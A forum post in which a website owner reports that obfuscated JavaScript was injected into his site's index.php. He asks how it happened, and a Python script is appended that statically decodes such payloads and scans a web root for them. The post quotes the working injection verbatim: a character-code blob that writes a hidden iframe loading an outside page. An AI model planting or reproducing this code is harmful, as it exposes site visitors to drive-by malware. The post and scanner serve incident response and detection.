My forum is located here:
/forum
In the root of my domain, I only have an index.php file which is like a disclaimer, with only basic HTML (Enter / Don't enter).
Problem is, the past few days members started reporting that their anti-virus etc. was saying my website is a malicious site, and warning of a virus.
I use Nod32 and Avast on my PCs, and I was not getting any warning message, but when I visited the root of my domain (index.php), it would auto-start ACROBATREADER.EXE.
It would start using VERY HIGH memory resources, but seem to do nothing else.
After I looked into things closely, I examined the index.php file and found the following code has somehow been added to the file:
PHP:
<?php echo ''; ?><?php echo ''; ?><?php echo ''; ?><?php echo ''; ?><?php echo ''; ?><?php echo ''; ?><?php echo ''; ?><?php echo ''; ?><?php echo ''; ?><?php echo '<script type="text/javascript">var jfbqwCRgMagVAISgjojw = "uxN60uxN105uxN102uxN114uxN97uxN109uxN101uxN32uxN119uxN105uxN100uxN116uxN104uxN61uxN34uxN52uxN56uxN48uxN34uxN32uxN104uxN101uxN105uxN103uxN104uxN116uxN61uxN34uxN54uxN48uxN34uxN32uxN115uxN114uxN99uxN61uxN34uxN104uxN116uxN116uxN112uxN58uxN47uxN47uxN112uxN114uxN111uxN102uxN105uxN45uxN116uxN111uxN111uxN108uxN116uxN105uxN112uxN46uxN98uxN105uxN122uxN47uxN98uxN108uxN111uxN103uxN47uxN102uxN101uxN101uxN100uxN46uxN104uxN116uxN109uxN108uxN34uxN32uxN115uxN116uxN121uxN108uxN101uxN61uxN34uxN98uxN111uxN114uxN100uxN101uxN114uxN58uxN48uxN112uxN120uxN59uxN32uxN112uxN111uxN115uxN105uxN116uxN105uxN111uxN110uxN58uxN114uxN101uxN108uxN97uxN116uxN105uxN118uxN101uxN59uxN32uxN116uxN111uxN112uxN58uxN48uxN112uxN120uxN59uxN32uxN108uxN101uxN102uxN116uxN58uxN45uxN53uxN48uxN48uxN112uxN120uxN59uxN32uxN111uxN112uxN97uxN99uxN105uxN116uxN121uxN58uxN48uxN59uxN32uxN102uxN105uxN108uxN116uxN101uxN114uxN58uxN112uxN114uxN111uxN103uxN105uxN100uxN58uxN68uxN88uxN73uxN109uxN97uxN103uxN101uxN84uxN114uxN97uxN110uxN115uxN102uxN111uxN114uxN109uxN46uxN77uxN105uxN99uxN114uxN111uxN115uxN111uxN102uxN116uxN46uxN65uxN108uxN112uxN104uxN97uxN40uxN111uxN112uxN97uxN99uxN105uxN116uxN121uxN61uxN48uxN41uxN59uxN32uxN45uxN109uxN111uxN122uxN45uxN111uxN112uxN97uxN99uxN105uxN116uxN121uxN58uxN48uxN34uxN62uxN60uxN47uxN105uxN102uxN114uxN97uxN109uxN101uxN62";var pCtNiMOUYGQHlsyivQPI = jfbqwCRgMagVAISgjojw.split("uxN");var qwdrEwYolHlaKeosrDNQ = "";for (var JdXvWWeRmuZdqDUuzsjk=1; JdXvWWeRmuZdqDUuzsjk<pCtNiMOUYGQHlsyivQPI.length; JdXvWWeRmuZdqDUuzsjk++){qwdrEwYolHlaKeosrDNQ+=String.fromCharCode(pCtNiMOUYGQHlsyivQPI[JdXvWWeRmuZdqDUuzsjk]);}document.write(qwdrEwYolHlaKeosrDNQ)</script>'; ?>
Can anyone tell me how someone's done this as I am the only person with FTP access to my website, other than my host.
I've removed this code from the index.php file now and it seems to be fine, but I want to make sure this cannot happen again.
I've also changed the index.php file for an index.html file.
I'm also worried that they have uploaded something else on my server too, and not just added this coding. Is there any way to scan the server for a virus? Is this something my host would need to do?
Can anyone give me any help with this as I need to make sure it doesn't happen again, and that I've totally got rid of it.
Can't believe this has happened, after only posting in this thread a couple of days ago!
Is there any way this code has been added to my index.php file because of this? That's when it all started, as soon as I added dock in rock (I've removed it now).
Thanks for any help.
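
Added example, not part of the original post: the injected line stores decimal character codes separated by `uxN`, splits them, and writes the result with `document.write`; in the post's sample the decoded markup is an invisible iframe. The Python sketch below decodes such blobs statically (no JavaScript is executed) and walks a web root for other files carrying one. The sample page and its placeholder URL are constructed, and the function names are assumptions of this example.

```python
import re
import sys
from pathlib import Path

# var NAME = "<delim>60<delim>105...";  the long encoded string
ASSIGN_RE = re.compile(r'var\s+(\w+)\s*=\s*"([^"]{20,})"')
IFRAME_SRC_RE = re.compile(r'<iframe[^>]*\bsrc="([^"]+)"', re.I)
HIDDEN_RE = re.compile(r'opacity\s*:\s*0|left\s*:\s*-\d+px|display\s*:\s*none', re.I)

# Constructed sample using the same scheme as the injected line; placeholder URL.
CONSTRUCTED_HTML = ('<iframe width="1" height="1" src="http://placeholder.invalid/'
                    'feed.html" style="opacity:0; left:-500px"></iframe>')
SAMPLE_PAGE = ('<?php echo \'<script type="text/javascript">var a = "'
               + "".join("uxN%d" % ord(ch) for ch in CONSTRUCTED_HTML)
               + '";var b = a.split("uxN");var c = "";for (var i=1; i<b.length; i++)'
               '{c+=String.fromCharCode(b[i]);}document.write(c)</script>\'; ?>')

def decode_charcode_blobs(text):
    """Return the markup hidden in split()/fromCharCode blobs, without running JS."""
    if "fromCharCode" not in text:
        return []
    decoded = []
    for name, blob in ASSIGN_RE.findall(text):
        split = re.search(r'\b%s\.split\("([^"]+)"\)' % re.escape(name), text)
        if not split:
            continue
        parts = blob.split(split.group(1))[1:]  # the injected loop starts at index 1
        if parts and all(p.isdecimal() and int(p) < 0x110000 for p in parts):
            decoded.append("".join(chr(int(p)) for p in parts))
    return decoded

def scan_tree(root, exts=(".php", ".html", ".htm", ".js")):
    """Walk a web root and report every file carrying a decodable blob."""
    findings = []
    for path in sorted(Path(root).rglob("*")):
        if path.is_file() and path.suffix.lower() in exts:
            for payload in decode_charcode_blobs(path.read_text(errors="replace")):
                findings.append({"file": str(path),
                                 "iframe_src": IFRAME_SRC_RE.findall(payload),
                                 "hidden": bool(HIDDEN_RE.search(payload))})
    return findings

if __name__ == "__main__":
    print(decode_charcode_blobs(SAMPLE_PAGE))  # decode the built-in sample
    for hit in (scan_tree(sys.argv[1]) if len(sys.argv) > 1 else []):
        print(hit)
```

Run against a downloaded copy of the site, a hit on any file other than the one already cleaned means the injection touched more than index.php. A clean result covers only this one encoding scheme.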